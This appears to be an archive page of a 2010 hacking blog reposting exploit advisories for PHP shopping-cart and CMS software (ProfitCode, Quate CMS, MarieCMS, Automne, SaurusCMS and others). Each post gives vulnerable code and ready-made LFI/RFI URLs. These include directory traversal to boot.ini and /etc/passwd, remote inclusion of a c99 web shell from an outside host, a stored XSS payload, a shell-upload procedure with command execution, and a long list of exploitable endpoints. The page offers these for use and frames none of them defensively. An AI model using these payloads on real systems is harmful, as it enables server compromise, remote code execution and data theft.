2010 January 13 « From A-Z and 0-9

January 2010
S	M	T	W	T	F	S
« Dec		Feb »
	1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30
31

ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities

January 13, 2010, 10:54 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable

- There are Cople of pages that has the LFI vuln

Vuln c0de : dl-authcontent.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$returlvar = "dloads";

include "$docroot" . "tplates/usrauthlogin.php";

exit;

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit :

http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]

Sample :

http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00

***************************************************************************************************

vuln c0de : dl-maincatsearch-dlcontent.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

include("$docroot" . "shopincs/catpgtop$langFile.php");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit

http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]

Sample

http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00

Vuln c0de : dloads-payed.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

include "$docroot" . "tplates/usrauthlogin.php";

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit

http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]

Sample

http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00

************************************************************************

- For Some resons this comeup with a RFI

Vuln c0de : dloads-header.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit

http://server/store/dloads/dloads-header.php?docroot=[RFI]

Sample

http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00

Comments Off

OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability

January 13, 2010, 10:50 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable

[@]=====================================================================================================[@]

[+] 3rr0r Bu9 : - pageHeader.php

[@]=====================================================================================================[@]

[+] 3xpl0it : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?]

[@]=====================================================================================================[@]

Comments Off

Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability

January 13, 2010, 10:47 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable

#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)

# <?php

# if ($bypass_restrict != 1) {

# require_once($secure_page_path. "includes/secure.php");

# }

# ?>

#PoC : http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???

#

#########################################################################

#

#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)

# <?PHP

# if ($not_logged_in != 1) {

# if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {

# require_once("themes/" .$row_secure['account_theme']. "/footer.php");

# ?>

#PoC : http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00

#

Comments Off

MarieCMS v0.9 LFI, RFI, and XSS Vulnerabilities

January 13, 2010, 10:43 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable, XSS

######################

PoC

######################

# Remote File Inclusion:

++++++++++++++++++++++++

http://server/mariecms/?page=http://[attacker]/[site]/shell.txt?

# Local File Inclusion:

+++++++++++++++++++++++

http://server/mariecms/?mod=../../../../../../../../../../boot.ini%00

http://server/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00

# Persistent XSS:

+++++++++++++++++

Put <script>alert("XSS")</script> in "Name" field on page

http://server/mariecms/?page=addgb&mod=gaestebuch

# Shell Upload (Authenticated User):

+++++++++++++++

1. Rename shell.php to shell.jpg.php

2. Upload it into galleryupload section.

3. View images to get image id for shell.jpg.php

4. Access shell:

http://[server]/[path]/_images/[image_id].php?cmd=dir

Comments Off

Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability

January 13, 2010, 10:40 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable

## No Sanitize Variable $_SERVER["DOCUMENT_ROOT"] ##

##                                                                      ##

##automne/imagezoom.php?DOCUMENT_ROOT=[Shell] ##

##automne/is_alive.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/backtrace.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/favorites-sidepanel.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/file-infos.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/group.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/groups.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/groups-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/groups-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/help.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/ie6.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/image-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/index.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/login.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/login-form.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/logs.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/logs-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/module.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/module-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/module-parameters.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules-categories.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules-categories-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules-categories-nodes.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules-categories-rights.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules-category.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/navigator.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/no-pages.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/no-rights.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-add.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-content.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-content-block-file.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-content-block-flash.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-content-block-image.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-content-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-copy.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-infos.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-logs.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-previsualization.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-properties.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-redirect-info.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-rows-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/page-templates-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/phpinfo.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/resource-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/row.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/row-help.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/rows-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/scripts.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/search.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/search-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/search-pages.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/server.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/server-check.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/server-scripts.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/server-scripts-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/side-panel.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/stat.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/template.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/template-help.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/template-print.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-file.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-files.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-files-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-files-nodes.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-page.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-row.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/templates-rows.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/tree.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/tree-duplicate.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/tree-lineage.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/tree-nodes.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/upload-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/user.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/user-admin-rights.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/user-modules-rights.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/users.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/users-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/users-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/users-groups.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/validations.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/validations-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/validations-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/validations-sidepanel.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/cms_aliases/index.php?DOCUMENT_ROOT=[Shell] ####

##automne/admin/modules/cms_aliases/alias.php?DOCUMENT_ROOT=[Shell] ####

##automne/admin/modules/cms_forms/content_block.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/cms_forms/item.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/cms_forms/csv.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/cms_forms/itemactions.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/cms_forms/index.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/cms_forms/items.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/items-controler.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/list-datas.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/search.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/content-block.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/item.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/item-selector.php?DOCUMENT_ROOT=[Shell] ####

##automne/admin/modules/polymod/list-objects.php?DOCUMENT_ROOT=[Shell] ####

##automne/admin/modules/polymod/update-definitions.php?DOCUMENT_ROOT=[Shell]##

##automne/admin/modules/polymod/fckplugin.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/items.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/list-categories.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin/modules/polymod/polymod-help.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/getValidationByID.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/linxbuilder.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/module_parameters.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/modulecategories_usersgroups.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/patch.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/polymod_field.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/polymod_plugin_definition.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/tree.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/wysiwyg.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/archives.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/logs.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/modulecategories.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/modulecategory.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/patch_error_correction.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/polymod_object.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/polymod_rss_definition.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/website.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/entry.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/index.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/module.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/modulecategories_usersgroup.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/modules_admin.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/polymod_object_infos.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/serverResponse.php?DOCUMENT_ROOT=[Shell] ##

##automne/admin-v3/websites.php?DOCUMENT_ROOT=[Shell] ##

##automne/classes/polymodFrontEnd.php?DOCUMENT_ROOT=[Shell] ##

##js/serverCall.php?DOCUMENT_ROOT=[Shell] ##

Comments Off

SaurusCMS <= 4.6.4 Multiple RFI Exploit

January 13, 2010, 10:38 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable

~ Code [class.writeexcel_workbook.inc.php]

global $class_path;

require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";

require_once $class_path."excel/class.writeexcel_format.inc.php";

//require_once "class.writeexcel_formula.inc.php";

require_once $class_path."excel/class.writeexcel_olewriter.inc.php";

~ PoC

[SaurusCMS_path]/classes/excel/class.writeexcel_workbook.inc.php?class_path=[Shell]

~ Code [class.writeexcel_worksheet.inc.php]

global $class_path;

require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";

~ PoC

[SaurusCMS_path]/classes/excel/class.writeexcel_worksheet.inc.php?class_path=[Shell]

Comments Off

« Older Posts

	Emmanuel on Exploits
	bacayuk on Joomla! JCal Pro Component …
	admin on FestOs <= 2.2.1 Multiple RF…
	Me on Joomla Component com_morfeosho…
	Skypanther on FestOs <= 2.2.1 Multiple RF…
	admin on PointComma 3.8b2 Remote File I…

From A-Z and 0-9

Meta

Pages

Archives

Categories

Recent Posts

Recent Comments

Top Posts

Top Clicks

Blog Stats

Follow “From A-Z and 0-9”